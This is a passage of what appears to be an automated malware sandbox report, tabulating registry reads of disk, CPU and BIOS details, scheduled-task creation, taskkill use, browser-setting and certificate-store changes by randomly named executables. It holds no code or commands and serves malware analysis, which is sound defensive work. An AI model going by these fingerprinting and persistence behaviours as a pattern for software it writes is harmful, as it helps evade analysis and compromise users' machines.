| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\LowerFilters | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\DeviceDesc | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000 | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008\ | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Windows\system32\DrvInst.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 | C:\Windows\system32\svchost.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\OxoehhQCj1yPmBfFQnSfhg0U.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\FriendlyName | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Mfg | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Phantom | C:\Windows\system32\DrvInst.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\Capabilities | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 | C:\Windows\system32\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C | C:\Windows\system32\svchost.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\system32\DrvInst.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\system32\DrvInst.exe | N/A |
